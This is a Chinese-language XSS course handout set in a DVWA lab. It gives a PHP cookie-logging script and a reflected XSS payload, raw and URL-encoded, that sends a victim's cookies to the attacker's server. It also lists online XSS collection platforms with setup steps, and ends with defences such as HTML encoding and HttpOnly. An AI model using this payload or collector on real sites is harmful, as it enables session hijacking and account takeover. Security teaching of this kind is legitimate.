知了汇智《XSS攻击-盗取cookie实战》课程文档讲解

文章来源：知了汇智冯老师

今天是《web安全-XSS攻击》系列的最后一篇啦，希望大家好好学习哦~

XSS之

知了汇智-禁卫实验室(GoDun.F)

1. 编写获取cookie的代码cookie.php,并将其放在一个web服务器上。

内容如下：

<?php

$cookie=$_GET['cookie'];

file_put_contents('cookie.txt',$cookie);

?>

2. 构造如下URL，并发送给被攻击者：

原始URL：

http://location/dvwa/vulnerabilities/xss_r/?name=

<script>doument.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>

需要进行URL编码：

http://localhost/dvwa/vulnerabilities/xss_r/?name=

%3Cscript%3Edocument.location%3D%27http%3A%2f%2f127.0.0.1%2fcookie.php%3Fcookie%3D%27%2bdocument.cookie%3B%3C%2fscript%3E#

3. 受害者点击URL，会跳转到http://127.0.0.1/dvwa/cookie.php，并将cookie写入到了同目录下的cookie.txt中：

4. cookie.txt文件保存了受害者的cookie

5.最后攻击者利用获取到的cookie修改本地的cookie，登录到受害者的账户

试平台部署及应用

知了汇智-禁卫实验室(GoDun.F)

0 XSS测试平台介绍

XSS测试平台是测试XSS漏洞获取cookie并接收Web页面的平台，XSS可以做JS能做的所有事，包括但不限于窃取cookie、后台增删改文章、钓鱼、利用XSS漏洞进行传播、修改网页代码、网站重定向、获取用户信息等。

1 线上可用的XSS平台

https://xsspt.com/index.php?do=login

https://xss8.cc/xss.php

2 自构XSS平台

A:找到Sql注入的开源平台，复制源代然后将其粘贴到网站的目录中

B:创建“xssplatform”的数据库

C:选择XSS平台数据库，导入源码包中的xssplatform.sql文件

D:执行如下SQL命令，将数据库中原有URL地址修改为自己的URL

UPDATE oc_module SET code=REPLACE(code,'http://xsser.me','http://localhost/XSS')

E:将authtest.php中的网址替换为自己的URL

F：注册帐号。

将config.php中的invite改为normal，即为开放注册

在phpMyAdmin中选择oc_user，将注册用过的adminLevel值改为1

配置伪静态文件.htaccess，在平台跟目录下创建.htaccess文件，根据中间件类型写入代码

Nginx：

http://localhost/xss/index.php访问，然后注册，注册成功后将config.php中的改回invite，即关闭开放注册功能

G: http://localhost/xss/index.php访问登录

3 XSS测试平台窃取用户信息实战

XSS的防御

知了汇智-禁卫实验室(GoDun.F)

0 XSS的防御

XSS防御的总体思路是：对用户的输入(和URL参数)进行过滤，对输出进行html编码。也就是对用户提交的所有内容进行过滤，对url中的参数进行过滤，过滤掉会导致脚本执行的相关内容；然后对动态输出到页面的内容进行html编码，使脚本无法在浏览器中执行。

对输入的内容进行过滤，可以分为黑名单过滤和白名单过滤。黑名单过滤虽然可以拦截大部分的XSS攻击，但是还是存在被绕过的风险。白名单过滤虽然可以基本杜绝XSS攻击，但是真实环境中一般是不能进行如此严格的白名单过滤的。

对输出进行html编码，就是通过函数，将用户的输入的数据进行html编码，使其不能作为脚本运行。

如下，是使用php中的htmlspecialchars函数对用户输入的name参数进行html编码，将其转换为html实体

#使用htmlspecialchars函数对用户输入的name参数进行html编码，将其转换为html实体

$name = htmlspecialchars( $_GET[ 'name' ] );

如下，图一是没有进行html编码的，图2是进行了html编码的。经过html编码后script标签被当成了html实体

我们还可以服务端设置会话Cookie的HTTP Only属性，这样，客户端的JS脚本就不能获取Cookie信息了

1 修复总结

因为XSS漏洞涉及输入和输出两部分，所以其修复也分两种

A:过滤输入的数据，包括” ‘ ”,” “ ”,”<”,”>” “on*”等非法字符。

B:对输出到页面的数据进行相应的编码转换，包括HTML实体编码、JavaScript编码等。

本次关于XSS攻击的课程就结束啦，谢谢大家关注。